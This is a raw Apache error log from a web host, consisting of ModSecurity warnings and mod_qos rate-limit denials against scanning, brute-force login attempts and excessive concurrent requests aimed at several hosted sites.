[Tue May 26 19:59:43.377064 2026] [security2:error] [pid 106517:tid 106709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R6QAAAL8"]
[Tue May 26 19:59:43.385164 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp25-AAAAAd0"]
[Tue May 26 19:59:43.391205 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R6gAAAJQ"]
[Tue May 26 19:59:43.391710 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R6AAAANs"]
[Tue May 26 19:59:43.412473 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp25-CAAAAaI"]
[Tue May 26 19:59:43.416249 2026] [security2:error] [pid 106517:tid 106738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R6wAAANw"]
[Tue May 26 19:59:43.420439 2026] [security2:error] [pid 106517:tid 106735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R7wAAANk"]
[Tue May 26 19:59:43.423459 2026] [security2:error] [pid 106517:tid 106669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R9AAAAJg"]
[Tue May 26 19:59:43.436828 2026] [security2:error] [pid 106517:tid 106668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R-AAAAJc"]
[Tue May 26 19:59:43.441956 2026] [security2:error] [pid 93868:tid 94301] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp25-EAAAAbo"]
[Tue May 26 19:59:43.445270 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0RgAAAGI"]
[Tue May 26 19:59:43.453543 2026] [security2:error] [pid 93868:tid 94090] [remote 103.95.119.103:40292] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-VwAByyM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:59:43.542127 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0sAAAAB8
[Tue May 26 19:59:43.542761 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuV2DRMqfxdEDkosz0sQAAAGE
[Tue May 26 19:59:43.546007 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuV2DRMqfxdEDkosz0sgAAACo
[Tue May 26 19:59:43.568460 2026] [qos:error] [pid 93868:tid 94293] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-cgAAAbI
[Tue May 26 19:59:43.573220 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0swAAABY
[Tue May 26 19:59:43.576284 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0tAAAABU
[Tue May 26 19:59:43.579815 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0tQAAAC4
[Tue May 26 19:59:43.584446 2026] [security2:error] [pid 93576:tid 93814] [client 103.163.220.46:26375] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/filemanager.php"] [unique_id "ahWuV2DRMqfxdEDkosz0tgAAAGY"]
[Tue May 26 19:59:43.585424 2026] [qos:error] [pid 93868:tid 94364] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-cwAAAfk
[Tue May 26 19:59:43.594765 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0twAAAAw
[Tue May 26 19:59:43.597651 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0uAAAAE8
[Tue May 26 19:59:43.691690 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0ugAAAD8
[Tue May 26 19:59:43.697485 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0uwAAACU
[Tue May 26 19:59:43.700827 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0vAAAAGQ
[Tue May 26 19:59:43.722447 2026] [qos:error] [pid 93868:tid 94319] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-dgAAAcw
[Tue May 26 19:59:43.725920 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0vQAAABo
[Tue May 26 19:59:43.727090 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0vgAAAAU
[Tue May 26 19:59:43.732420 2026] [qos:error] [pid 93868:tid 94361] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-dwAAAfY
[Tue May 26 19:59:43.733406 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0wQAAAEo
[Tue May 26 19:59:43.741998 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0wgAAAB4
[Tue May 26 19:59:43.749173 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0xAAAAEw
[Tue May 26 19:59:43.843964 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0yAAAADg
[Tue May 26 19:59:43.845113 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0yQAAAEE
[Tue May 26 19:59:43.855352 2026] [qos:error] [pid 93576:tid 93730] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0ygAAABI
[Tue May 26 19:59:43.875646 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0ywAAAA0
[Tue May 26 19:59:43.877189 2026] [qos:error] [pid 93868:tid 94275] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-egAAAaA
[Tue May 26 19:59:43.880176 2026] [qos:error] [pid 93868:tid 94360] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV0qK9k_ZUB2Vp25-fAAAAfU
[Tue May 26 19:59:43.881751 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0zAAAADY
[Tue May 26 19:59:43.887479 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0zQAAAHg
[Tue May 26 19:59:43.889526 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0zgAAADs
[Tue May 26 19:59:43.901527 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz0zwAAAFQ
[Tue May 26 19:59:43.994580 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuV2DRMqfxdEDkosz00QAAAAc
[Tue May 26 19:59:44.004527 2026] [qos:error] [pid 93576:tid 93803] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz00gAAAFs
[Tue May 26 19:59:44.009032 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz00wAAACY
[Tue May 26 19:59:44.029800 2026] [qos:error] [pid 93576:tid 93808] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz01AAAAGA
[Tue May 26 19:59:44.030029 2026] [qos:error] [pid 93868:tid 94308] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-fwAAAcE
[Tue May 26 19:59:44.030873 2026] [qos:error] [pid 93868:tid 94325] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-gAAAAdI
[Tue May 26 19:59:44.035515 2026] [qos:error] [pid 93576:tid 93836] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz01QAAAHw
[Tue May 26 19:59:44.038719 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz01gAAACI
[Tue May 26 19:59:44.047327 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz01wAAABk
[Tue May 26 19:59:44.059985 2026] [qos:error] [pid 93576:tid 93815] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz02AAAAGc
[Tue May 26 19:59:44.144667 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz02wAAAHk
[Tue May 26 19:59:44.152254 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz03AAAAFw
[Tue May 26 19:59:44.162939 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz03QAAAB8
[Tue May 26 19:59:44.177409 2026] [qos:error] [pid 93868:tid 94355] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-hQAAAfA
[Tue May 26 19:59:44.179199 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz03gAAAGE
[Tue May 26 19:59:44.186195 2026] [qos:error] [pid 93868:tid 94350] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWEqK9k_ZUB2Vp25-hgAAAes
[Tue May 26 19:59:44.186989 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz03wAAADo
[Tue May 26 19:59:44.190134 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz04AAAACo
[Tue May 26 19:59:44.201735 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz04QAAAC8
[Tue May 26 19:59:44.211569 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWGDRMqfxdEDkosz04gAAAFA
[Tue May 26 19:59:44.276917 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0QwAAAFU"]
[Tue May 26 19:59:44.284224 2026] [security2:error] [pid 93868:tid 94273] [client 103.163.220.46:37617] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/goods.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-iQAAAZ4"]
[Tue May 26 19:59:44.294718 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp25-DgAAAbw"]
[Tue May 26 19:59:44.296543 2026] [security2:error] [pid 106517:tid 106660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVoZZc2DoU1lPnP1R-QAAAI8"]
[Tue May 26 19:59:44.303443 2026] [security2:error] [pid 93868:tid 94288] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp25-CwAAAa0"]
[Tue May 26 19:59:44.304106 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp25-GQAAAZw"]
[Tue May 26 19:59:44.306921 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp25-CgAAAfw"]
[Tue May 26 19:59:44.306921 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0QgAAAEY"]
[Tue May 26 19:59:44.322453 2026] [security2:error] [pid 93576:tid 93807] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0WAAAAF8"]
[Tue May 26 19:59:44.325664 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0RAAAACg"]
[Tue May 26 19:59:44.326269 2026] [security2:error] [pid 93868:tid 94304] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp25-GAAAAb0"]
[Tue May 26 19:59:44.336636 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0UAAAAD4"]
[Tue May 26 19:59:44.340849 2026] [security2:error] [pid 93868:tid 94281] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp25-LQAAAaY"]
[Tue May 26 19:59:44.342127 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0UgAAAAE"]
[Tue May 26 19:59:44.354256 2026] [security2:error] [pid 93868:tid 94339] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-SgAAAeA"]
[Tue May 26 19:59:44.354351 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0RQAAAHM"]
[Tue May 26 19:59:44.357865 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0TwAAAAk"]
[Tue May 26 19:59:44.373701 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0WQAAAGw"]
[Tue May 26 19:59:44.374969 2026] [security2:error] [pid 93868:tid 94306] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVkqK9k_ZUB2Vp25-FQAAAb8"]
[Tue May 26 19:59:44.387124 2026] [security2:error] [pid 93868:tid 94313] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-TgAAAcY"]
[Tue May 26 19:59:44.397860 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SCQAAAPw"]
[Tue May 26 19:59:44.399252 2026] [security2:error] [pid 93868:tid 94291] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-VAAAAbA"]
[Tue May 26 19:59:44.401795 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuVmDRMqfxdEDkosz0XQAAAHI"]
[Tue May 26 19:59:44.405461 2026] [security2:error] [pid 106517:tid 106702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV4ZZc2DoU1lPnP1SDAAAALg"]
[Tue May 26 19:59:44.414924 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-VQAAAb4"]
[Tue May 26 19:59:44.415085 2026] [security2:error] [pid 93868:tid 94329] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-UgAAAdY"]
